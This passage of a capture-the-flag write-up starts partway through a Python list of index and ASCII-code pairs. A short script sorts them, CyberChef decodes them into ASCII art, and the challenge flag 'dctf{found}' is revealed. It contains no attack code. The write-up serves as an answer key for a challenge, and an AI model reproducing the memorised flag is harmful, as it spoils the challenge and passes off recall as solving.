/span>,<span>"32"</span>],[<span>462</span>,<span>"124"</span>],[<span>492</span>,<span>"32"</span>],[<span>88</span>,<span>"95"</span>],[<span>143</span>,<span>"124"</span>],[<span>709</span>,<span>"32"</span>],[<span>382</span>,<span>"32"</span>],[<span>703</span>,<span>"32"</span>],[<span>367</span>,<span>"124"</span>],[<span>542</span>,<span>"124"</span>],[<span>66</span>,<span>"32"</span>],[<span>296</span>,<span>"32"</span>],[<span>321</span>,<span>"124"</span>],[<span>485</span>,<span>"96"</span>],[<span>262</span>,<span>"32"</span>],[<span>54</span>,<span>"32"</span>],[<span>102</span>,<span>"32"</span>],[<span>521</span>,<span>"95"</span>],[<span>208</span>,<span>"124"</span>],[<span>115</span>,<span>"32"</span>],[<span>338</span>,<span>"32"</span>],[<span>194</span>,<span>"32"</span>],[<span>215</span>,<span>"32"</span>],[<span>534</span>,<span>"95"</span>],[<span>189</span>,<span>"124"</span>],[<span>378</span>,<span>"124"</span>],[<span>151</span>,<span>"32"</span>],[<span>204</span>,<span>"92"</span>],[<span>339</span>,<span>"32"</span>],[<span>406</span>,<span>"32"</span>],[<span>719</span>,<span>"32"</span>],[<span>364</span>,<span>"124"</span>],[<span>202</span>,<span>"32"</span>],[<span>465</span>,<span>"124"</span>],[<span>388</span>,<span>"32"</span>],[<span>491</span>,<span>"124"</span>],[<span>457</span>,<span>"32"</span>],[<span>69</span>,<span>"32"</span>],[<span>710</span>,<span>"32"</span>],[<span>60</span>,<span>"95"</span>],[<span>589</span>,<span>"95"</span>],[<span>86</span>,<span>"32"</span>],[<span>99</span>,<span>"95"</span>],[<span>348</span>,<span>"95"</span>],[<span>334</span>,<span>"124"</span>],[<span>632</span>,<span>"32"</span>],[<span>444</span>,<span>"32"</span>],[<span>466</span>,<span>"32"</span>],[<span>639</span>,<span>"32"</span>],[<span>159</span>,<span>"32"</span>],[<span>497</span>,<span>"92"</span>],[<span>161</span>,<span>"32"</span>],[<span>635</span>,<span>"32"</span>],[<span>365</span>,<span>"32"</span>],[<span>325</span>,<span>"32"</span>],[<span>323</span>,<span>"32"</span>],[<span>295</span>,<span>"124"</span>],[<span>662</span>,<span>"32"</span>],[<span>500</span>,<span>"32"</span>],[<span>691</span>,<span>"32"</span>],[<span>551</span>,<span>"124"</span>],[<span>223</span>,<span>"45"</span>],[<span>284</span>,<span>"32"</span>],[<span>176</span>,<span>"124"</span>],[<span>198</span>,<span>"32"</span>],[<span>575</span>,<span>"32"</span>],[<span>224</span>,<span>"45"</span>],[<span>156</span>,<span>"95"</span>],[<span>84</span>,<span>"95"</span>],[<span>563</span>,<span>"32"</span>],[<span>363</span>,<span>"95"</span>],[<span>637</span>,<span>"32"</span>],[<span>278</span>,<span>"32"</span>],[<span>550</span>,<span>"32"</span>],[<span>650</span>,<span>"32"</span>],[<span>557</span>,<span>"32"</span>],[<span>167</span>,<span>"92"</span>],[<span>58</span>,<span>"95"</span>],[<span>89</span>,<span>"95"</span>],[<span>308</span>,<span>"32"</span>],[<span>2</span>,<span>"95"</span>],[<span>426</span>,<span>"32"</span>],[<span>469</span>,<span>"32"</span>],[<span>568</span>,<span>"95"</span>],[<span>601</span>,<span>"32"</span>],[<span>190</span>,<span>"32"</span>],[<span>322</span>,<span>"32"</span>],[<span>174</span>,<span>"32"</span>],[<span>372</span>,<span>"32"</span>],[<span>602</span>,<span>"92"</span>],[<span>303</span>,<span>"32"</span>],[<span>690</span>,<span>"32"</span>],[<span>276</span>,<span>"32"</span>],[<span>241</span>,<span>"32"</span>],[<span>404</span>,<span>"32"</span>],[<span>569</span>,<span>"124"</span>],[<span>234</span>,<span>"45"</span>],[<span>507</span>,<span>"45"</span>],[<span>411</span>,<span>"92"</span>],[<span>612</span>,<span>"95"</span>],[<span>253</span>,<span>"32"</span>],[<span>726</span>,<span>"32"</span>],[<span>381</span>,<span>"124"</span>],[<span>536</span>,<span>"95"</span>],[<span>227</span>,<span>"45"</span>],[<span>119</span>,<span>"32"</span>],[<span>403</span>,<span>"32"</span>],[<span>50</span>,<span>"95"</span>],[<span>328</span>,<span>"32"</span>],[<span>717</span>,<span>"32"</span>],[<span>56</span>,<span>"32"</span>],[<span>34</span>,<span>"95"</span>],[<span>107</span>,<span>"32"</span>],[<span>607</span>,<span>"124"</span>],[<span>184</span>,<span>"92"</span>],[<span>291</span>,<span>"32"</span>],[<span>410</span>,<span>"32"</span>],[<span>580</span>,<span>"95"</span>],[<span>383</span>,<span>"32"</span>],[<span>153</span>,<span>"32"</span>],[<span>578</span>,<span>"95"</span>],[<span>541</span>,<span>"32"</span>],[<span>283</span>,<span>"124"</span>],[<span>247</span>,<span>"32"</span>],[<span>346</span>,<span>"32"</span>],[<span>533</span>,<span>"95"</span>],[<span>146</span>,<span>"47"</span>],[<span>386</span>,<span>"32"</span>],[<span>201</span>,<span>"92"</span>],[<span>301</span>,<span>"46"</span>],[<span>135</span>,<span>"124"</span>],[<span>678</span>,<span>"32"</span>],[<span>293</span>,<span>"124"</span>],[<span>5</span>,<span>"95"</span>],[<span>588</span>,<span>"95"</span>],[<span>687</span>,<span>"32"</span>],[<span>606</span>,<span>"32"</span>],[<span>640</span>,<span>"32"</span>],[<span>577</span>,<span>"95"</span>],[<span>16</span>,<span>"95"</span>],[<span>126</span>,<span>"32"</span>],[<span>285</span>,<span>"124"</span>],[<span>418</span>,<span>"32"</span>],[<span>594</span>,<span>"47"</span>],[<span>77</span>,<span>"46"</span>],[<span>347</span>,<span>"95"</span>],[<span>11</span>,<span>"95"</span>],[<span>185</span>,<span>"32"</span>],[<span>370</span>,<span>"124"</span>],[<span>249</span>,<span>"124"</span>],[<span>331</span>,<span>"32"</span>],[<span>83</span>,<span>"95"</span>],[<span>675</span>,<span>"32"</span>],[<span>9</span>,<span>"32"</span>],[<span>445</span>,<span>"32"</span>],[<span>10</span>,<span>"32"</span>],[<span>171</span>,<span>"32"</span>],[<span>76</span>,<span>"32"</span>],[<span>539</span>,<span>"32"</span>],[<span>573</span>,<span>"32"</span>],[<span>448</span>,<span>"32"</span>],[<span>495</span>,<span>"32"</span>],[<span>661</span>,<span>"32"</span>],[<span>419</span>,<span>"39"</span>],[<span>724</span>,<span>"47"</span>],[<span>51</span>,<span>"95"</span>],[<span>145</span>,<span>"32"</span>],[<span>47</span>,<span>"95"</span>],[<span>722</span>,<span>"95"</span>],[<span>220</span>,<span>"44"</span>],[<span>289</span>,<span>"92"</span>],[<span>79</span>,<span>"95"</span>],[<span>397</span>,<span>"124"</span>],[<span>128</span>,<span>"32"</span>],[<span>671</span>,<span>"32"</span>],[<span>53</span>,<span>"95"</span>],[<span>110</span>,<span>"32"</span>],[<span>616</span>,<span>"32"</span>],[<span>434</span>,<span>"32"</span>],[<span>665</span>,<span>"32"</span>],[<span>166</span>,<span>"32"</span>],[<span>131</span>,<span>"32"</span>],[<span>516</span>,<span>"32"</span>],[<span>379</span>,<span>"32"</span>],[<span>369</span>,<span>"32"</span>],[<span>168</span>,<span>"32"</span>],[<span>271</span>,<span>"32"</span>],[<span>629</span>,<span>"32"</span>],[<span>40</span>,<span>"32"</span>],[<span>621</span>,<span>"124"</span>],[<span>32</span>,<span>"95"</span>],[<span>427</span>,<span>"32"</span>],[<span>677</span>,<span>"32"</span>],[<span>517</span>,<span>"32"</span>],[<span>600</span>,<span>"124"</span>],[<span>547</span>,<span>"32"</span>],[<span>105</span>,<span>"32"</span>],[<span>653</span>,<span>"32"</span>],[<span>265</span>,<span>"32"</span>],[<span>553</span>,<span>"95"</span>],[<span>663</span>,<span>"32"</span>],[<span>565</span>,<span>"32"</span>],[<span>244</span>,<span>"95"</span>],[<span>255</span>,<span>"32"</span>],[<span>304</span>,<span>"124"</span>],[<span>524</span>,<span>"95"</span>],[<span>609</span>,<span>"95"</span>],[<span>590</span>,<span>"95"</span>],[<span>169</span>,<span>"32"</span>],[<span>527</span>,<span>"95"</span>],[<span>389</span>,<span>"124"</span>],[<span>546</span>,<span>"32"</span>],[<span>424</span>,<span>"32"</span>],[<span>136</span>,<span>"32"</span>],[<span>425</span>,<span>"124"</span>],[<span>549</span>,<span>"32"</span>],[<span>307</span>,<span>"32"</span>],[<span>226</span>,<span>"96"</span>],[<span>13</span>,<span>"95"</span>],[<span>693</span>,<span>"32"</span>],[<span>349</span>,<span>"124"</span>],[<span>1</span>,<span>"95"</span>],[<span>525</span>,<span>"95"</span>],[<span>342</span>,<span>"32"</span>],[<span>522</span>,<span>"95"</span>],[<span>292</span>,<span>"32"</span>],[<span>71</span>,<span>"32"</span>],[<span>694</span>,<span>"32"</span>],[<span>559</span>,<span>"32"</span>],[<span>613</span>,<span>"95"</span>],[<span>337</span>,<span>"124"</span>],[<span>685</span>,<span>"32"</span>],[<span>552</span>,<span>"95"</span>],[<span>480</span>,<span>"124"</span>],[<span>391</span>,<span>"32"</span>],[<span>519</span>,<span>"10"</span>],[<span>417</span>,<span>"32"</span>],[<span>356</span>,<span>"32"</span>],[<span>561</span>,<span>"124"</span>],[<span>318</span>,<span>"124"</span>],[<span>311</span>,<span>"10"</span>],[<span>207</span>,<span>"10"</span>],[<span>33</span>,<span>"95"</span>],[<span>684</span>,<span>"32"</span>],[<span>187</span>,<span>"32"</span>],[<span>464</span>,<span>"32"</span>],[<span>447</span>,<span>"124"</span>],[<span>670</span>,<span>"32"</span>],[<span>498</span>,<span>"32"</span>],[<span>333</span>,<span>"32"</span>],[<span>443</span>,<span>"32"</span>],[<span>302</span>,<span>"32"</span>],[<span>170</span>,<span>"124"</span>],[<span>453</span>,<span>"32"</span>],[<span>352</span>,<span>"47"</span>],[<span>605</span>,<span>"124"</span>],[<span>508</span>,<span>"45"</span>],[<span>28</span>,<span>"95"</span>],[<span>25</span>,<span>"95"</span>],[<span>619</span>,<span>"32"</span>],[<span>15</span>,<span>"95"</span>],[<span>26</span>,<span>"95"</span>],[<span>264</span>,<span>"32"</span>],[<span>359</span>,<span>"32"</span>],[<span>144</span>,<span>"32"</span>],[<span>479</span>,<span>"32"</span>],[<span>219</span>,<span>"32"</span>],[<span>471</span>,<span>"124"</span>],[<span>74</span>,<span>"95"</span>],[<span>134</span>,<span>"124"</span>],[<span>413</span>,<span>"32"</span>],[<span>165</span>,<span>"32"</span>],[<span>721</span>,<span>"47"</span>],[<span>400</span>,<span>"32"</span>],[<span>96</span>,<span>"32"</span>],[<span>258</span>,<span>"95"</span>],[<span>392</span>,<span>"46"</span>],[<span>327</span>,<span>"32"</span>],[<span>90</span>,<span>"95"</span>],[<span>656</span>,<span>"32"</span>],[<span>530</span>,<span>"92"</span>],[<span>393</span>,<span>"32"</span>],[<span>109</span>,<span>"32"</span>],[<span>488</span>,<span>"39"</span>],[<span>581</span>,<span>"95"</span>],[<span>63</span>,<span>"32"</span>],[<span>414</span>,<span>"92"</span>],[<span>700</span>,<span>"32"</span>],[<span>597</span>,<span>"124"</span>],[<span>446</span>,<span>"32"</span>],[<span>149</span>,<span>"47"</span>],[<span>312</span>,<span>"124"</span>],[<span>62</span>,<span>"95"</span>],[<span>288</span>,<span>"32"</span>],[<span>456</span>,<span>"92"</span>],[<span>603</span>,<span>"95"</span>],[<span>243</span>,<span>"95"</span>],[<span>463</span>,<span>"32"</span>],[<span>192</span>,<span>"32"</span>],[<span>17</span>,<span>"32"</span>],[<span>132</span>,<span>"32"</span>],[<span>461</span>,<span>"32"</span>],[<span>625</span>,<span>"32"</span>],[<span>193</span>,<span>"32"</span>],[<span>412</span>,<span>"32"</span>],[<span>42</span>,<span>"32"</span>],[<span>196</span>,<span>"32"</span>],[<span>182</span>,<span>"32"</span>],[<span>478</span>,<span>"32"</span>],[<span>394</span>,<span>"96"</span>],[<span>579</span>,<span>"95"</span>],[<span>688</span>,<span>"32"</span>],[<span>245</span>,<span>"32"</span>],[<span>8</span>,<span>"32"</span>],[<span>657</span>,<span>"32"</span>],[<span>535</span>,<span>"95"</span>],[<span>509</span>,<span>"39"</span>],[<span>344</span>,<span>"32"</span>],[<span>330</span>,<span>"32"</span>],[<span>595</span>,<span>"32"</span>],[<span>81</span>,<span>"32"</span>],[<span>649</span>,<span>"32"</span>],[<span>267</span>,<span>"32"</span>],[<span>140</span>,<span>"95"</span>],[<span>127</span>,<span>"32"</span>],[<span>395</span>,<span>"32"</span>],[<span>481</span>,<span>"32"</span>],[<span>336</span>,<span>"32"</span>],[<span>490</span>,<span>"32"</span>],[<span>218</span>,<span>"32"</span>],[<span>175</span>,<span>"32"</span>],[<span>200</span>,<span>"32"</span>],[<span>362</span>,<span>"95"</span>],[<span>554</span>,<span>"124"</span>],[<span>157</span>,<span>"95"</span>],[<span>91</span>,<span>"95"</span>],[<span>723</span>,<span>"95"</span>],[<span>266</span>,<span>"124"</span>],[<span>513</span>,<span>"32"</span>],[<span>231</span>,<span>"32"</span>],[<span>160</span>,<span>"47"</span>],[<span>452</span>,<span>"32"</span>],[<span>376</span>,<span>"124"</span>],[<span>467</span>,<span>"32"</span>],[<span>195</span>,<span>"32"</span>],[<span>604</span>,<span>"95"</span>],[<span>660</span>,<span>"32"</span>],[<span>416</span>,<span>"124"</span>],[<span>108</span>,<span>"32"</span>],[<span>672</span>,<span>"32"</span>],[<span>179</span>,<span>"124"</span>],[<span>405</span>,<span>"124"</span>],[<span>52</span>,<span>"95"</span>],[<span>18</span>,<span>"46"</span>],[<span>59</span>,<span>"95"</span>],[<span>642</span>,<span>"32"</span>],[<span>123</span>,<span>"32"</span>],[<span>638</span>,<span>"32"</span>],[<span>14</span>,<span>"95"</span>],[<span>564</span>,<span>"124"</span>],[<span>624</span>,<span>"32"</span>],[<span>511</span>,<span>"32"</span>],[<span>545</span>,<span>"124"</span>],[<span>566</span>,<span>"124"</span>],[<span>314</span>,<span>"32"</span>],[<span>704</span>,<span>"32"</span>],[<span>528</span>,<span>"47"</span>],[<span>472</span>,<span>"32"</span>],[<span>408</span>,<span>"124"</span>],[<span>520</span>,<span>"124"</span>],[<span>305</span>,<span>"32"</span>],[<span>225</span>,<span>"39"</span>],[<span>139</span>,<span>"95"</span>],[<span>294</span>,<span>"32"</span>],[<span>75</span>,<span>"32"</span>],[<span>138</span>,<span>"32"</span>],[<span>385</span>,<span>"32"</span>],[<span>441</span>,<span>"124"</span>],[<span>216</span>,<span>"32"</span>],[<span>503</span>,<span>"124"</span>],[<span>150</span>,<span>"124"</span>],[<span>538</span>,<span>"32"</span>],[<span>646</span>,<span>"32"</span>],[<span>674</span>,<span>"32"</span>],[<span>570</span>,<span>"32"</span>],[<span>164</span>,<span>"95"</span>],[<span>628</span>,<span>"32"</span>],[<span>41</span>,<span>"32"</span>],[<span>431</span>,<span>"45"</span>],[<span>117</span>,<span>"32"</span>],[<span>70</span>,<span>"32"</span>],[<span>489</span>,<span>"32"</span>],[<span>593</span>,<span>"95"</span>],[<span>451</span>,<span>"32"</span>],[<span>263</span>,<span>"124"</span>],[<span>510</span>,<span>"32"</span>],[<span>350</span>,<span>"32"</span>],[<span>290</span>,<span>"124"</span>],[<span>72</span>,<span>"32"</span>],[<span>583</span>,<span>"47"</span>],[<span>43</span>,<span>"95"</span>],[<span>713</span>,<span>"32"</span>],[<span>643</span>,<span>"32"</span>],[<span>415</span>,<span>"10"</span>],[<span>532</span>,<span>"95"</span>],[<span>696</span>,<span>"32"</span>],[<span>679</span>,<span>"32"</span>],[<span>514</span>,<span>"32"</span>],[<span>620</span>,<span>"32"</span>],[<span>384</span>,<span>"124"</span>],[<span>229</span>,<span>"45"</span>],[<span>181</span>,<span>"124"</span>],[<span>515</span>,<span>"47"</span>],[<span>214</span>,<span>"46"</span>],[<span>277</span>,<span>"124"</span>],[<span>585</span>,<span>"32"</span>],[<span>354</span>,<span>"32"</span>],[<span>614</span>,<span>"95"</span>],[<span>407</span>,<span>"32"</span>],[<span>39</span>,<span>"32"</span>],[<span>113</span>,<span>"32"</span>],[<span>257</span>,<span>"124"</span>],[<span>358</span>,<span>"124"</span>],[<span>502</span>,<span>"32"</span>],[<span>12</span>,<span>"95"</span>],[<span>698</span>,<span>"32"</span>],[<span>282</span>,<span>"32"</span>],[<span>351</span>,<span>"32"</span>],[<span>94</span>,<span>"95"</span>],[<span>529</span>,<span>"32"</span>],[<span>320</span>,<span>"32"</span>],[<span>162</span>,<span>"32"</span>],[<span>714</span>,<span>"32"</span>],[<span>112</span>,<span>"92"</span>],[<span>101</span>,<span>"32"</span>],[<span>468</span>,<span>"32"</span>],[<span>297</span>,<span>"32"</span>],[<span>269</span>,<span>"124"</span>],[<span>701</span>,<span>"32"</span>],[<span>152</span>,<span>"32"</span>],[<span>494</span>,<span>"32"</span>],[<span>273</span>,<span>"32"</span>],[<span>398</span>,<span>"32"</span>],[<span>287</span>,<span>"32"</span>],[<span>260</span>,<span>"32"</span>],[<span>7</span>,<span>"95"</span>],[<span>141</span>,<span>"95"</span>],[<span>440</span>,<span>"32"</span>],[<span>626</span>,<span>"32"</span>],[<span>48</span>,<span>"95"</span>],[<span>648</span>,<span>"32"</span>],[<span>680</span>,<span>"32"</span>],[<span>125</span>,<span>"32"</span>],[<span>455</span>,<span>"32"</span>],[<span>544</span>,<span>"95"</span>],[<span>518</span>,<span>"47"</span>],[<span>154</span>,<span>"95"</span>],[<span>64</span>,<span>"32"</span>],[<span>482</span>,<span>"124"</span>],[<span>437</span>,<span>"32"</span>],[<span>473</span>,<span>"32"</span>],[<span>506</span>,<span>"39"</span>],[<span>658</span>,<span>"32"</span>],[<span>460</span>,<span>"32"</span>],[<span>689</span>,<span>"32"</span>],[<span>46</span>,<span>"32"</span>],[<span>630</span>,<span>"32"</span>],[<span>659</span>,<span>"32"</span>],[<span>560</span>,<span>"32"</span>],[<span>537</span>,<span>"124"</span>],[<span>106</span>,<span>"32"</span>],[<span>37</span>,<span>"95"</span>],[<span>476</span>,<span>"45"</span>],[<span>360</span>,<span>"32"</span>],[<span>669</span>,<span>"92"</span>],[<span>217</span>,<span>"124"</span>],[<span>122</span>,<span>"124"</span>],[<span>562</span>,<span>"32"</span>],[<span>67</span>,<span>"95"</span>],[<span>375</span>,<span>"32"</span>],[<span>212</span>,<span>"45"</span>],[<span>373</span>,<span>"124"</span>],[<span>332</span>,<span>"32"</span>],[<span>310</span>,<span>"32"</span>],[<span>180</span>,<span>"32"</span>],[<span>210</span>,<span>"32"</span>],[<span>483</span>,<span>"32"</span>],[<span>692</span>,<span>"32"</span>],[<span>121</span>,<span>"124"</span>],[<span>230</span>,<span>"124"</span>],[<span>555</span>,<span>"32"</span>],[<span>236</span>,<span>"45"</span>],[<span>129</span>,<span>"32"</span>],[<span>439</span>,<span>"32"</span>],[<span>103</span>,<span>"10"</span>],[<span>420</span>,<span>"45"</span>],[<span>599</span>,<span>"95"</span>],[<span>487</span>,<span>"45"</span>],[<span>644</span>,<span>"32"</span>],[<span>682</span>,<span>"32"</span>],[<span>647</span>,<span>"32"</span>],[<span>712</span>,<span>"32"</span>],[<span>85</span>,<span>"46"</span>],[<span>390</span>,<span>"32"</span>],[<span>133</span>,<span>"32"</span>],[<span>261</span>,<span>"32"</span>],[<span>449</span>,<span>"32"</span>],[<span>631</span>,<span>"32"</span>],[<span>459</span>,<span>"92"</span>],[<span>401</span>,<span>"32"</span>],[<span>87</span>,<span>"32"</span>],[<span>78</span>,<span>"95"</span>],[<span>686</span>,<span>"32"</span>],[<span>699</span>,<span>"32"</span>],[<span>432</span>,<span>"45"</span>],[<span>366</span>,<span>"32"</span>],[<span>371</span>,<span>"32"</span>],[<span>484</span>,<span>"32"</span>],[<span>587</span>,<span>"92"</span>],[<span>221</span>,<span>"45"</span>],[<span>582</span>,<span>"95"</span>],[<span>343</span>,<span>"124"</span>],[<span>368</span>,<span>"32"</span>],[<span>623</span>,<span>"10"</span>],[<span>725</span>,<span>"32"</span>],[<span>3</span>,<span>"95"</span>],[<span>470</span>,<span>"32"</span>],[<span>627</span>,<span>"32"</span>],[<span>211</span>,<span>"46"</span>],[<span>353</span>,<span>"32"</span>],[<span>246</span>,<span>"32"</span>],[<span>380</span>,<span>"32"</span>],[<span>531</span>,<span>"95"</span>],[<span>608</span>,<span>"95"</span>],[<span>571</span>,<span>"32"</span>],[<span>233</span>,<span>"124"</span>],[<span>433</span>,<span>"46"</span>]] <span>list</span> <span>=</span> <span>sorted</span>(<span>list</span>) <span>for</span> <span>i</span> <span>in</span> <span>list</span>: <span>print</span>(<span>i</span>)</div></details>The array of numbers I got:<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="32 95 95 95 95 95 95 95 32 32 32 95 95 95 95 95 95 32 46 95 95 95 95 95 95 95 95 95 95 95 46 32 95 95 95 95 95 95 95 32 32 32 32 95 95 95 32 95 95 95 95 95 95 95 32 32 32 95 95 95 95 95 95 32 32 32 32 95 95 32 32 32 32 95 95 32 32 46 95 95 32 32 32 95 95 46 32 32 95 95 95 95 95 95 95 32 32 95 95 95 32 32 32 10 124 32 32 32 32 32 32 32 92 32 47 32 32 32 32 32 32 124 124 32 32 32 32 32 32 32 32 32 32 32 124 124 32 32 32 95 95 95 95 124 32 32 47 32 32 47 124 32 32 32 95 95 95 95 124 32 47 32 32 95 95 32 32 92 32 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 92 32 124 32 32 124 32 124 32 32 32 32 32 32 32 92 32 92 32 32 92 32 32 10 124 32 32 46 45 45 46 32 32 124 32 32 44 45 45 45 45 39 96 45 45 45 124 32 32 124 45 45 45 45 96 124 32 32 124 95 95 32 32 32 32 124 32 32 124 32 124 32 32 124 95 95 32 32 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 32 92 124 32 32 124 32 124 32 32 46 45 45 46 32 32 124 32 124 32 32 124 32 10 124 32 32 124 32 32 124 32 32 124 32 32 124 32 32 32 32 32 32 32 32 32 124 32 32 124 32 32 32 32 32 124 32 32 32 95 95 124 32 32 47 32 32 47 32 32 124 32 32 32 95 95 124 32 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 46 32 96 32 32 124 32 124 32 32 124 32 32 124 32 32 124 32 32 92 32 32 92 10 124 32 32 39 45 45 39 32 32 124 32 32 96 45 45 45 45 46 32 32 32 32 124 32 32 124 32 32 32 32 32 124 32 32 124 32 32 32 32 32 92 32 32 92 32 32 124 32 32 124 32 32 32 32 32 124 32 32 96 45 45 39 32 32 124 32 124 32 32 96 45 45 39 32 32 124 32 124 32 32 124 92 32 32 32 124 32 124 32 32 39 45 45 39 32 32 124 32 32 47 32 32 47 10 124 95 95 95 95 95 95 95 47 32 92 95 95 95 95 95 95 124 32 32 32 32 124 95 95 124 32 32 32 32 32 124 95 95 124 32 32 32 32 32 32 124 32 32 124 32 124 95 95 124 32 32 32 32 32 32 92 95 95 95 95 95 95 47 32 32 32 92 95 95 95 95 95 95 47 32 32 124 95 95 124 32 92 95 95 124 32 124 95 95 95 95 95 95 95 47 32 32 124 32 32 124 32 10 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 92 95 95 92 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 47 95 95 47 32 32">32 95 95 95 95 95 95 95 32 32 32 95 95 95 95 95 95 32 46 95 95 95 95 95 95 95 95 95 95 95 46 32 95 95 95 95 95 95 95 32 32 32 32 95 95 95 32 95 95 95 95 95 95 95 32 32 32 95 95 95 95 95 95 32 32 32 32 95 95 32 32 32 32 95 95 32 32 46 95 95 32 32 32 95 95 46 32 32 95 95 95 95 95 95 95 32 32 95 95 95 32 32 32 10 124 32 32 32 32 32 32 32 92 32 47 32 32 32 32 32 32 124 124 32 32 32 32 32 32 32 32 32 32 32 124 124 32 32 32 95 95 95 95 124 32 32 47 32 32 47 124 32 32 32 95 95 95 95 124 32 47 32 32 95 95 32 32 92 32 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 92 32 124 32 32 124 32 124 32 32 32 32 32 32 32 92 32 92 32 32 92 32 32 10 124 32 32 46 45 45 46 32 32 124 32 32 44 45 45 45 45 39 96 45 45 45 124 32 32 124 45 45 45 45 96 124 32 32 124 95 95 32 32 32 32 124 32 32 124 32 124 32 32 124 95 95 32 32 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 32 92 124 32 32 124 32 124 32 32 46 45 45 46 32 32 124 32 124 32 32 124 32 10 124 32 32 124 32 32 124 32 32 124 32 32 124 32 32 32 32 32 32 32 32 32 124 32 32 124 32 32 32 32 32 124 32 32 32 95 95 124 32 32 47 32 32 47 32 32 124 32 32 32 95 95 124 32 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 124 32 32 124 32 32 124 32 124 32 32 46 32 96 32 32 124 32 124 32 32 124 32 32 124 32 32 124 32 32 92 32 32 92 10 124 32 32 39 45 45 39 32 32 124 32 32 96 45 45 45 45 46 32 32 32 32 124 32 32 124 32 32 32 32 32 124 32 32 124 32 32 32 32 32 92 32 32 92 32 32 124 32 32 124 32 32 32 32 32 124 32 32 96 45 45 39 32 32 124 32 124 32 32 96 45 45 39 32 32 124 32 124 32 32 124 92 32 32 32 124 32 124 32 32 39 45 45 39 32 32 124 32 32 47 32 32 47 10 124 95 95 95 95 95 95 95 47 32 92 95 95 95 95 95 95 124 32 32 32 32 124 95 95 124 32 32 32 32 32 124 95 95 124 32 32 32 32 32 32 124 32 32 124 32 124 95 95 124 32 32 32 32 32 32 92 95 95 95 95 95 95 47 32 32 32 92 95 95 95 95 95 95 47 32 32 124 95 95 124 32 92 95 95 124 32 124 95 95 95 95 95 95 95 47 32 32 124 32 32 124 32 10 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 92 95 95 92 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 47 95 95 47 32 32</div>Convert from Decimal to ASCII and get the flag (I use CyberChef to do it)Flag:<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="dctf{found}">dctf{found}</div></article> </div> Using VIM, I easily take the number out from this file, but it's not sorted (Recommend you use VIM, VIM is powerful) So, I wrote a short script to sort The array of numbers I got: Convert from Decimal to ASCII and get the flag (I use CyberChef to do it) Flag: </div> </readme-toc> <details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump overflow-hidden" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" data-turbo="false" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go</button></form> </details-dialog> </details> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 